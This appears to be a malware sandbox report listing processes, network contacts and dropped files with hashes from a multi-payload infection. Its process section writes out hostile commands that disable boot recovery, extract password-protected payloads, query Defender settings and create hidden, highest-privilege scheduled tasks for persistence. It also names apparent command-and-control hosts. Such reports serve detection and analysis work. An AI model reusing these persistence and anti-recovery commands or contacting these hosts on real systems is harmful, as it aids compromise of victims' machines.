"C:\Users\Admin\AppData\Local\Temp\a\RambledMimets.exe"

C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe

"C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\libs.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\a\ld.exe

"C:\Users\Admin\AppData\Local\Temp\a\ld.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe

"C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\a\MSiedge.exe

"C:\Users\Admin\AppData\Local\Temp\a\MSiedge.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no

C:\Windows\system32\bcdedit.exe

bcdedit /set {current} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {current} recoveryenabled no

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\sxznnh')

C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe

"C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\IJUP069TW.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2

C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe

"C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\KKUS33HVT.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Users\Admin\AppData\Local\Temp\hqwokv.exe

"C:\Users\Admin\AppData\Local\Temp\hqwokv.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --field-trial-handle=1840,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=6100 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\a\victor.exe

"C:\Users\Admin\AppData\Local\Temp\a\victor.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 736 -ip 736

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 736 -s 232

C:\Users\Admin\AppData\Local\Temp\a\RambledMime.exe

"C:\Users\Admin\AppData\Local\Temp\a\RambledMime.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\a\current.exe

"C:\Users\Admin\AppData\Local\Temp\a\current.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\a\host_so.exe

"C:\Users\Admin\AppData\Local\Temp\a\host_so.exe"

C:\Users\Admin\AppData\Local\Temp\wegnhw.exe

"C:\Users\Admin\AppData\Local\Temp\wegnhw.exe"

C:\Users\Admin\AppData\Local\Temp\a\mixinte.exe

"C:\Users\Admin\AppData\Local\Temp\a\mixinte.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\a\inte.exe

"C:\Users\Admin\AppData\Local\Temp\a\inte.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\a\winlogon.exe

"C:\Users\Admin\AppData\Local\Temp\a\winlogon.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
RU 147.45.47.70:80 147.45.47.70 tcp
US 8.8.8.8:53 49.2.101.151.in-addr.arpa udp
US 8.8.8.8:53 70.47.45.147.in-addr.arpa udp
CN 124.71.81.174:80 tcp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 f.123654987.xyz udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
DE 49.13.194.118:80 49.13.194.118 tcp
RU 5.42.66.47:80 5.42.66.47 tcp
US 8.8.8.8:53 118.194.13.49.in-addr.arpa udp
US 8.8.8.8:53 47.66.42.5.in-addr.arpa udp
US 8.8.8.8:53 free.360totalsecurity.com udp
NL 151.236.127.172:443 free.360totalsecurity.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.127.236.151.in-addr.arpa udp
US 8.8.8.8:53 softcatalog.ru udp
RU 88.212.252.98:443 softcatalog.ru tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 98.252.212.88.in-addr.arpa udp
US 8.8.8.8:53 st.p.360safe.com udp
US 8.8.8.8:53 s.360safe.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tr.p.360safe.com udp
US 8.8.8.8:53 iup.360safe.com udp
DE 52.29.179.141:80 s.360safe.com tcp
MD 94.103.188.126:80 94.103.188.126 tcp
IE 54.76.174.118:80 tr.p.360safe.com udp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 141.179.29.52.in-addr.arpa udp
US 8.8.8.8:53 118.174.76.54.in-addr.arpa udp
US 8.8.8.8:53 126.188.103.94.in-addr.arpa udp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 int.down.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
US 8.8.8.8:53 iplogger.com udp
US 8.8.8.8:53 iplogger.com udp
US 172.67.188.178:443 iplogger.com udp
US 8.8.8.8:53 iplogger.com udp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
US 13.107.6.158:443 business.bing.com tcp
US 8.8.8.8:53 29.42.77.54.in-addr.arpa udp
US 8.8.8.8:53 178.188.67.172.in-addr.arpa udp
US 104.192.108.21:80 int.down.360safe.com tcp
US 8.8.8.8:53 www.google.com udp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 bzib.nelreports.net udp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 104.91.71.140:443 bzib.nelreports.net tcp
GB 142.250.187.196:443 www.google.com udp
US 104.192.108.20:80 int.down.360safe.com tcp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
GB 51.140.244.186:443 nav-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 sd.p.360safe.com udp
GB 99.86.249.221:80 sd.p.360safe.com tcp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 140.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 21.108.192.104.in-addr.arpa udp
US 8.8.8.8:53 17.108.192.104.in-addr.arpa udp
US 8.8.8.8:53 20.108.192.104.in-addr.arpa udp
US 8.8.8.8:53 186.244.140.51.in-addr.arpa udp
US 8.8.8.8:53 apis.google.com udp
US 8.8.8.8:53 apis.google.com udp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
GB 142.250.187.238:443 ogs.google.com tcp
GB 142.250.200.14:443 apis.google.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 ssl.gstatic.com udp
US 8.8.8.8:53 ssl.gstatic.com udp
GB 172.217.169.3:443 ssl.gstatic.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 221.249.86.99.in-addr.arpa udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 3.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 226.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 pepecasas123.net udp
DE 195.10.205.90:4608 pepecasas123.net tcp
US 8.8.8.8:53 90.205.10.195.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
DE 49.13.194.118:53848 tcp
DE 195.10.205.90:4608 pepecasas123.net tcp
DE 195.10.205.90:4608 pepecasas123.net tcp
US 8.8.8.8:53 checkforupdate.sytes.net udp
NL 185.73.125.6:80 185.73.125.6 tcp
US 8.8.8.8:53 6.125.73.185.in-addr.arpa udp
CN 119.91.25.19:8888 tcp
US 8.8.8.8:53 cobusabobus.cam udp
NL 185.43.220.45:4383 cobusabobus.cam tcp
US 8.8.8.8:53 45.220.43.185.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:80 api.ipify.org tcp
RU 91.215.85.135:80 91.215.85.135 tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 135.85.215.91.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
GB 142.250.179.238:443 play.google.com udp
NL 23.62.61.97:443 www.bing.com tcp
N/A 10.127.0.1:445 tcp
US 8.8.8.8:53 files2.tech udp
SG 118.194.235.187:50500 tcp
N/A 10.127.0.1:139 tcp
US 8.8.8.8:53 187.235.194.118.in-addr.arpa udp
DE 195.10.205.90:4608 pepecasas123.net tcp
US 104.192.108.17:80 int.down.360safe.com tcp
DE 77.91.77.33:80 77.91.77.33 tcp
US 8.8.8.8:53 33.77.91.77.in-addr.arpa udp
EE 45.129.96.86:80 45.129.96.86 tcp
US 8.8.8.8:53 86.96.129.45.in-addr.arpa udp
DE 195.10.205.90:4608 pepecasas123.net tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 8.8.8.8:53 doggie-services.com udp
FR 5.42.67.23:80 doggie-services.com tcp
US 8.8.8.8:53 23.67.42.5.in-addr.arpa udp
US 8.8.8.8:53 fragmentyperspowp.shop udp
US 104.21.20.181:443 fragmentyperspowp.shop tcp
US 8.8.8.8:53 181.20.21.104.in-addr.arpa udp
FR 5.42.67.23:80 doggie-services.com tcp
US 8.8.8.8:53 horsedwollfedrwos.shop udp
US 172.67.157.243:443 horsedwollfedrwos.shop tcp
N/A 10.127.0.1:135 tcp
RU 195.2.70.38:30001 195.2.70.38 tcp
US 8.8.8.8:53 243.157.67.172.in-addr.arpa udp
RU 185.231.155.234:17073 tcp
US 8.8.8.8:53 patternapplauderw.shop udp
US 8.8.8.8:53 38.70.2.195.in-addr.arpa udp
US 8.8.8.8:53 234.155.231.185.in-addr.arpa udp
DE 49.13.194.118:80 49.13.194.118 tcp
US 172.67.174.208:443 patternapplauderw.shop tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 8.8.8.8:53 understanndtytonyguw.shop udp
US 104.21.22.94:443 understanndtytonyguw.shop tcp
US 8.8.8.8:53 208.174.67.172.in-addr.arpa udp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp

Files

memory/1332-0-0x0000000000BA0000-0x0000000000BA8000-memory.dmp

memory/1332-1-0x00007FFFE6243000-0x00007FFFE6245000-memory.dmp

memory/1332-2-0x00007FFFE6240000-0x00007FFFE6D01000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe

MD5 e817cc929fbc651c5bdab9e8cca0d9d9
SHA1 4d73dc2afcde6a1dcf9417c0120252a2d8fd246f
SHA256 3a7327bd54ba0dfa36bbf0b9d0dc820984d6d0e0316cfa4045ab4c1e7e447282
SHA512 a9c1e547ef74c20e0a21dfc951463fb6883a23da4c323c96c5e64ac5793e774ceae898d4cf486e1bf1ea8fb69360610639a1046005fcdb9bd9f8463aec4a3e2f

memory/3340-14-0x0000000074F4E000-0x0000000074F4F000-memory.dmp

memory/3340-15-0x0000000000560000-0x00000000007A0000-memory.dmp

memory/3340-16-0x0000000074F40000-0x00000000756F0000-memory.dmp

memory/3340-17-0x0000000005280000-0x000000000549C000-memory.dmp

memory/3340-18-0x00000000065D0000-0x00000000067EE000-memory.dmp

memory/3340-19-0x0000000006DC0000-0x0000000007364000-memory.dmp

memory/3340-20-0x0000000006910000-0x00000000069A2000-memory.dmp

memory/3340-21-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-32-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-34-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-48-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-63-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-64-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-76-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-74-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-72-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-70-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-68-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-66-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-60-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-58-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-54-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-50-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-56-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-52-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-46-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-44-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-40-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-38-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-37-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-42-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-30-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-28-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-26-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-24-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-22-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-78-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-84-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-82-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-81-0x00000000065D0000-0x00000000067E8000-memory.dmp

memory/3340-4907-0x0000000074F40000-0x00000000756F0000-memory.dmp

memory/3340-4909-0x0000000006A90000-0x0000000006ADC000-memory.dmp

memory/3340-4908-0x0000000006A30000-0x0000000006A88000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe

MD5 b11913361b2d4c43c00c1969184050a8
SHA1 8358fa3426e4136e0873a32f49f5f367770bad0a
SHA256 de39bc2c5f18ae468501a573ee5cb9b22f2f608ec2fc51954b44d4549fac2a57
SHA512 2d25c021ddf59a10b63c56d85a550e7454767444472f3e40662dda1e1dddeef551202253cf9137bf4054ed832cd59c53b66aba6d42361f044fe4e7b06bef2026

memory/4036-4921-0x0000000000E10000-0x0000000000E11000-memory.dmp

memory/5632-4926-0x0000000000400000-0x000000000087C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe

MD5 66a5a529386533e25316942993772042
SHA1 053d0d7f4cb6e3952e849f02bbfbdb4d39021146
SHA256 713a497c8da97c2082758fd31147539f408a72b62041c6c9ed77037021621e94
SHA512 9f4f69e9d1a3265311cd9f4bb9a254f157e1e0b7536466e88449f410f297d501d10448b170901206fff0ffde6d7e8a50b84e391fd62ff0f9355b506959cc336a

C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe

MD5 0c2564813f2b9fc088cfb6938214d3cb
SHA1 cbb0bc2dfe83d38b9e4a8e47d182e6d7ee6a29b0
SHA256 1043faf46b5a19cbe10410e01725b38caf0db7f36b73c68e103ebca8da2d18d2
SHA512 06d4df2ed5d79c1d33ca06d977d936643c78139f484747bdfaac690b84f064620a6dc33014b0146acebce4e935688dc2a1445e7e2f830ec3b75e5e2dafa02ed1

C:\Users\Admin\AppData\Local\Temp\nsh6F12.tmp\UAC.dll

MD5 adb29e6b186daa765dc750128649b63d
SHA1 160cbdc4cb0ac2c142d361df138c537aa7e708c9
SHA256 2f7f8fc05dc4fd0d5cda501b47e4433357e887bbfed7292c028d99c73b52dc08
SHA512 b28adcccf0c33660fecd6f95f28f11f793dc9988582187617b4c113fb4e6fdad4cf7694cd8c0300a477e63536456894d119741a940dda09b7df3ff0087a7eada

C:\Users\Admin\AppData\Local\Temp\nsh6F12.tmp\nsExec.dll

MD5 132e6153717a7f9710dcea4536f364cd
SHA1 e39bc82c7602e6dd0797115c2bd12e872a5fb2ab
SHA256 d29afce2588d8dd7bb94c00ca91cac0e85b80ffa6b221f5ffcb83a2497228eb2
SHA512 9aeb0b3051ce07fb9f03dfee7cea4a5e423425e48cb538173bd2a167817f867a30bd4d27d07875f27ca00031745b24547030b7f146660b049fa717590f1c77e1

C:\Users\Admin\AppData\Local\Temp\putty\Smartscreen.bat

MD5 f6423b02fa9b2de5b162826b26c0dc56
SHA1 01e7e79e6018c629ca11bc30f15a1a3e6988773e
SHA256 59f52a56309ecb5c9c256a88db12a60403e5b0a8c0b8c013e7f6c9c5c395ff83
SHA512 5974e3a1bfe84719a2af614995f821d1c0a751b2ef2b39a3f6087c31dec609eb57d0824a28304e68365b75a0c7a3978aa28ed26c8f392976bd3337c1e8561459

memory/5396-4966-0x0000000002860000-0x0000000002896000-memory.dmp

memory/2192-4967-0x000000001BC50000-0x000000001C11E000-memory.dmp

memory/5396-4968-0x0000000005310000-0x0000000005938000-memory.dmp

memory/2192-4969-0x000000001B6A0000-0x000000001B746000-memory.dmp

memory/5396-4971-0x0000000005940000-0x0000000005962000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\New.exe

MD5 384cc82bf0255c852430dc13e1069276
SHA1 26467194c29d444e5373dfdde2ff2bca1c12ef9a
SHA256 ba2567627674eada0b5462b673cdea4ed11a063174c87b775927db7e7d6ef99c
SHA512 7838ee81a8d13c3722627424270ac877081afc399be862ce9b1614a1df3c12f98066d28f2a9a81bcf626f14fe90d83ef8039cd679f40851f2d6d83c3839e73be

memory/5396-4983-0x0000000005AD0000-0x0000000005B36000-memory.dmp

memory/5488-4984-0x0000018B362F0000-0x0000018B362FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ii42j0om.qas.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5396-4990-0x0000000005B40000-0x0000000005E94000-memory.dmp

memory/5396-4982-0x0000000005A60000-0x0000000005AC6000-memory.dmp

memory/5396-4995-0x0000000006170000-0x000000000618E000-memory.dmp

memory/5396-4996-0x0000000006190000-0x00000000061DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe

MD5 2de14d82238bf5395e0b95e551ab8e00
SHA1 f9c7f00ad7c624d190e06cda3c5adf02bb207074
SHA256 aa9d5004f89fe3952e5ee0b148e6a36574d372bb5ffadae5733a7ee77127f8d4
SHA512 9a5f2f781b52ea793021bf641a8be95f9611bfe936e9bd96978ec9066b4a7390b847f2e597cfd9ac69de9ac35b7238147538a23c3a27313d19c16258e2446f2a

C:\Users\Admin\AppData\Local\Temp\{50E737AD-4F6B-49b5-9940-CB0DF21B4794}.tmp\360P2SP.dll

MD5 fc1796add9491ee757e74e65cedd6ae7
SHA1 603e87ab8cb45f62ecc7a9ef52d5dedd261ea812
SHA256 bf1b96f5b56be51e24d6314bc7ec25f1bdba2435f4dfc5be87de164fe5de9e60
SHA512 8fa2e4ff5cbc05034051261c778fec1f998ceb2d5e8dea16b26b91056a989fdc58f33767687b393f32a5aff7c2b8d6df300b386f608abd0ad193068aa9251e0d

memory/5396-5017-0x00000000079E0000-0x000000000805A000-memory.dmp

memory/5396-5018-0x0000000006670000-0x000000000668A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 184a117024f3789681894c67b36ce990
SHA1 c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e
SHA256 b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e
SHA512 354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7

C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini

MD5 e6edb41c03bce3f822020878bde4e246
SHA1 03198ad7bbfbdd50dd66ab4bed13ad230b66e4d9
SHA256 9fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454
SHA512 2d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1

memory/5488-5049-0x0000018B50AC0000-0x0000018B50B28000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\putty.zip

MD5 188fbf5c7b5748e1f750be2bab44e0a0
SHA1 525afccfc532830f71f068acfbf9ac49a1463539
SHA256 14a23a25c21deba6f3a85d2e24085a95881302499bcdde6dc9a585fe46b9f370
SHA512 62d6232ec09e266585f29c9fe335a6f02cfc0dbd8aa02545b0648eec7424aa25c4138cff49015073aede2a45506c056cbaa592cfc5d3a537313d9ee5bf1c6608

C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

MD5 7a9a33206f80078ba80f7a839cd92451
SHA1 55447378c48561c35bad1317b58a34ee50c5072f
SHA256 e53c379d95e95706c5a2c4d6cd609857368a3bf14f28d7e67f6e3f8dfce6d486
SHA512 61873ed9b7616de998eff2ca90c6698cb0df87d181344fc6e02fd70fcd87fd8028cfdb7f606a3637514463982c161549729145118190e42b7f47365716f23aba

memory/660-5066-0x0000000000400000-0x0000000000416000-memory.dmp
